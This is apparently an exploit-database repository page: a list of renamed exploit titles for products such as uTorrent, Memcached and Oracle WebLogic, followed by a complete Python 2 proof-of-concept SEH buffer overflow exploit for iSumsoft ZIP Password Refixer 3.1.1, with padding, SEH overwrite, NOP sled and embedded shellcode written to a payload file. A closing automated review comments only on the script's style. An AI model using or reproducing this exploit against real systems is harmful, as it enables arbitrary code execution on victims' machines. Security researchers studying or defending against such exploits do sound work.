
15 changes to exploits/shellcodes

uTorrent / BitTorrent WebIU HTTP 1.7.7/6.0.1 - Range header Denial of Service
μTorrent (uTorrent) / BitTorrent WebIU HTTP 1.7.7/6.0.1 - Range header Denial of Service
uTorrent 1.8.3 Build 15772 - Create New Torrent Buffer Overflow (PoC)
μTorrent (uTorrent) 1.8.3 Build 15772 - Create New Torrent Buffer Overflow (PoC)
uTorrent WebUI 0.370 - Authorisation Header Denial of Service
μTorrent (uTorrent) WebUI 0.370 - Authorisation Header Denial of Service
Memcached - 'memcrashed' Denial of Service
Memcached 1.5.5 - 'Memcrashed' Insufficient Control Network Message Volume Denial of Service (2)
Memcached 1.5.5 - 'Memcrashed' Insufficient Control Network Message Volume Denial of Service (1)
Memcached 1.5.5 - 'Memcrashed ' Insufficient Control of Network Message Volume Denial of Service With Shodan API
Broadcom BCM43xx Wi-Fi - 'BroadPWN' Denial of Service
WebLog Expert Enterprise 9.4 - Denial of Service
uTorrent 2.0.3 - 'plugin_dll.dll' DLL Hijacking
μTorrent (uTorrent) 2.0.3 - 'plugin_dll.dll' DLL Hijacking
uTorrent 2.0.3 - DLL Hijacking
μTorrent (uTorrent) 2.0.3 - DLL Hijacking
iSumsoft ZIP Password Refixer 3.1.1 - Buffer Overflow
Microsoft Office - 'Composite Moniker Remote Code Execution
Mozilla Firefox - Address Bar Spoofing
Tor (Firefox 41 < 50) - Code Execution
Chrome 35.0.1916.153 - Sandbox Escape / Command Execution
WebLog Expert Enterprise 9.4 - Authentication Bypass
uTorrent 1.6 build 474 - 'announce' Key Remote Heap Overflow
μTorrent (uTorrent) 1.6 build 474 - 'announce' Key Remote Heap Overflow
t. hauck jana WebServer 1.0/1.45/1.46 - Directory Traversal
T. Hauck Jana Server 1.0/1.45/1.46 - Directory Traversal
Oracle WebLogic Server 10.3.6.0.0 / 12.x - Remote Command Execution
Werkzeug - 'Debug Shell' Command Execution
TikiWiki < 1.9.9 - 'tiki-listmovies.php' Directory Traversal
TikiWiki Project < 1.9.9 - 'tiki-listmovies.php' Directory Traversal
toronja CMS - SQL Injection
Toronja CMS - SQL Injection
uTorrent WebUI 0.310 Beta 2 - Cross-Site Request Forgery
μTorrent (uTorrent) WebUI 0.310 Beta 2 - Cross-Site Request Forgery
tinybrowser - 'tinybrowser.php' Directory Listing
tinybrowser - 'edit.php' Directory Listing
TinyBrowser - 'tinybrowser.php' Directory Listing
TinyBrowser - 'edit.php' Directory Listing
Xoops 2.5.7.2 - Directory Traversal Bypass
XOOPS 2.5.7.2 - Directory Traversal Bypass
SAP BusinessObjects launch pad - Server-Side Request Forgery
antMan < 0.9.1a - Authentication Bypass
Bacula-Web < 8.0.0-rc2 - SQL Injection
51 lines
No EOL
1.6 KiB
Python
Executable file
author = '''
##############################################
# Created: ScrR1pTK1dd13 #
# Name: Greg Priest #
# Mail: ScR1pTK1dd13.slammer@gmail.com #
##############################################
# Exploit Title:iSumsoft Local Buffer Overflow Vuln. 0day(SEH)
# Date: 2018.03.02
# Exploit Author: Greg Priest
# Version: iSumsoft ZIP Password Refixer Version 3.1.1
# Tested on: Windows7 x64 HUN/ENG Professional
'''
junk = "A" * 340
nSEH = "\xeb\x06\x90\x90"
SEH = "\x0C\x70\x8D\x73"
nop = "\x90" *16
shellcode =(
"\x31\xdb\x64\x8b\x7b\x30\x8b\x7f" + #cmd.exe shellcode!
"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b" +
"\x77\x20\x8b\x3f\x80\x7e\x0c\x33" +
"\x75\xf2\x89\xc7\x03\x78\x3c\x8b" +
"\x57\x78\x01\xc2\x8b\x7a\x20\x01" +
"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6" +
"\x45\x81\x3e\x43\x72\x65\x61\x75" +
"\xf2\x81\x7e\x08\x6f\x63\x65\x73" +
"\x75\xe9\x8b\x7a\x24\x01\xc7\x66" +
"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7" +
"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9" +
"\xb1\xff\x53\xe2\xfd\x68\x63\x61" +
"\x6c\x63\x89\xe2\x52\x52\x53\x53" +
"\x53\x53\x53\x53\x52\x53\xff\xd7")
crash = junk + nSEH + SEH + nop + shellcode + "C" * 300
exploit = open('iSumsoft-exploit.txt', 'w')
exploit.write(crash)
exploit.close()
print author
print '''
#####################
#This is a PoC code!#
#####################
'''
print "[+] iSumsoft-exploit.txt ready!"
print '[+] Copy iSumsoft-exploit.txt string and paste "start from:" field!'
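Review bot: the file is committed as an executable with no trailing newline, yet it carries no interpreter line, and the bare `print author` and `print "[+] ..."` statements at the end only parse under Python 2; either drop the executable bit or state the interpreter the script expects, and end the file with a newline. The header block (title, date, version, tested platform) is also held in the runtime string `author` rather than in comments, so that metadata is only visible by reading the script body or running it; moving it into `#` comments at the top would keep the record readable without execution. The output file is opened and closed by hand with `open(...)` and `exploit.close()`; a `with` block would close it even if the write fails.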